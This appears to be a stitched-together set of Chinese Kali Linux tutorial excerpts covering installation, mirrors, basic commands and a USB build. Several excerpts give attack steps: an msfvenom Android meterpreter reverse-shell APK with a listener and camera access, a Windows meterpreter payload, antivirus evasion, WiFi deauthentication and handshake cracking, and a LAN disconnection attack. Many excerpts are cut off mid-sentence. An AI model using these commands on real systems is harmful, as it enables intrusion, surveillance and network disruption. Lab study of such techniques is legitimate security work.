得到kali本机IP，设置端口利用msfpayload模块生成木马命令：msfvenom-pandroid/meterpreter/reverse_tcp lhost=192.168.174.129lport=5555R>1.apk木马生成后开启我们的监听模块msfconsole进入控制端后，设置一个安卓的playload（之前使用过的） 设置监听kali虚拟机的ip地址和端口号（与之前生成apk木马文件的命令参数相同）run启用，等待木马被点击。 木马成功执行后可进行操作，已经拿下目标喽 打开摄像头命令操作，这里我的摄像头没有开启。感谢各位的观看，希望能够帮助到你们！

前言kali是一种Linux系统，是专门用来渗透的，是由backtrack系统演化而来的，后面结合了lwhax，whoppix以及auditor才改名成kali。kali里面装了许多的渗透软件比如nmap，wireshark，burpsuit等，是安全从业人员的必备利器一、kali的目录结构二、kali的基本命令命令结构命令结构：分为命令选项对象[注意：kali命令严格区分大小写]基本命令用户管理文件管理ls    查看用户文件列表cd    切换工作路径pwd    打印当前工作路径cp    复制find   指定目录查找文件mkdir   创建文件夹mv    改名或移动rm    移除

目录前言访问官方网站导航到下载页面启动后界面操作前言"Kali"可能指的是KaliLinux，它是一种基于Debian的Linux发行版，专门用于渗透测试、网络安全评估、数字取证和相关的安全任务。KaliLinux旨在提供一系列用于测试网络和系统安全性的工具，以及为安全专业人员和爱好者提供一个强大的平台。访问官方网站打开您的网络浏览器，然后访问KaliLinux官方网站：KaliLinux|PenetrationTestingandEthicalHackingLinuxDistribution 导航到下载页面在官方网站上，寻找一个名为"Downloads"、"DownloadKali"或类似的

一.更新环境kali-linux-2021.1-installer-amd64二.问题描述大家在安装好KailLinux系统之后为了更快更稳定地更新系统都会选择换国内的源，但是我在网上查找资料的时候发现大部分教程都停留在2021年以及之前，这给学习带来了很大的困难，通过这篇博客我们将一起探讨解决KaliLinux换国内源后更新失败的问题。问题1国内源的地址大部分都是http开头，这些地址早就无法打开。三.解决方案以阿里云的更新源为例阿里云debhttp://mirrors.aliyun.com/kalikali-rollingmainnon-freecontribdeb-srchttp://m

所需工具：KaliLinux系统、无线网卡(免驱动)需要用到的命令：#查看网卡是否支持监听模式airmon-ng#开启网卡监听airmon-ngstart网卡名#扫描附近WiFiairodump-ng网卡名#抓取握手包airodump-ng--bssidWiFi的BSSID-c信道频率-w抓包存储的路径网卡名#攻击已连接设备，使其掉线aireplay-ng-0 信道频率 -aWiFi的BSSID-c连接到WiFi的mac地址网卡名#字典爆破aircrack-ng-w密码字典握手包路径具体操作步骤：步骤1：插入 无线网卡 连接到KaliLinux输入 ifconfig 查看是否有网卡信息步骤2：

此次实战将演示在内网中实现断网攻击，使得目标主机不能上网。如果实验对象是宿主机，那么请把kali虚拟机改变为桥接网络！以VMware为例，如下图所示设置桥接网络。靶机是其他主机，则另当别论。1.首先在终端输入ipconfig查看kali的网卡和ip地址信息，如下图所示，ip地址：192.168.0.102，网卡：eth0。 2.接下来扫描同一网络下存活的主机。在终端输入nmap-O192.168.0.102/24（具体ip地址根据实际情况修改），嗅探同一网络下的设备型号和ip地址，如下图所示，发现192.168.0.101这个ip地址有可能是windows10系统（有可能会出现误差），此系统便

vmware虚拟机下载地址：https://www.vmware.com/cn/products/workstation-pro/workstation-pro-evaluation.htmlkaliISO镜像https://cdimage.kali.org/kali-2022.4/kali-linux-2022.4-installer-amd64.isoKALI安装教程一、前期准备kali镜像下载地址：http://mirrors.ustc.edu.cn/kali-images/ 二、VMware虚拟机配置打开vmware，点击创建新的虚拟机2、选择自定义(高级)选项，点击下一步3、继续下一

1.阅读前的声明本文章中生成的木马带有一定的攻击性，使用时请遵守网络安全相关的法律法规（恶意攻击操作系统属于违法行为）。2.利用kali操作系统的metasploit攻击windows操作系统kali中打开终端最好是进入rootsudosu获取IPipaddress重新打开一个终端msfconsoleinit//（初始化metasploit数据库）输入指令，注：-p表示攻击载荷，表示的是说明这个程序需要载入什么功能，这里就是windows/x64/meterpreter/reverse_tcp（开始操作系统的远程连接服务）,后面的是远程连接的执行主机和该连接使用的端口，-f表示的生成的文件格式

自制U盘版KALI1.准备材料1.1硬件1.2软件2.步骤2.1下载镜像2.2烧录2.3启动测试2.4持久化分区3.使用本文介绍了如何制作U盘版即插即用的Kali，且配有持久化功能。所谓持久化，可以理解为在系统中操作和创建的文件等在断电后依旧保存。而非持久化的系统在断电重启后则恢复到初始状态，不保存上一次开机后的操作。1.准备材料1.1硬件1.32GB以上，USB3.0及以上U盘一块；2.电脑一台；1.2软件1.balenaEtcher2.分区助手3.VMWareWorkstation（已安装Kali，用于配置持久化分区）4.KaliUSB版镜像2.步骤2.1下载镜像下载KaliUSB版镜像，

目的：制作一个能够绕过火绒检测的简单木马，熟悉一下怎么使用msfvenom制作木马，因此此处使用的火绒版本较低。工具准备：火绒安全-3.0.42.0下载文章：火绒历史全版本百度网盘链接：https://pan.baidu.com/s/1ZrpYG63aDtQDVBnDFZoeXw提取码：kr72实验环境：kali-2019.4（攻击方，IP：192.168.255.130）、win10（靶机）【知识补充】关于Msfvenom：（msfvenom----aMetasploitstandalonepayloadgenerator，Alsoareplacementformsfpayloadandms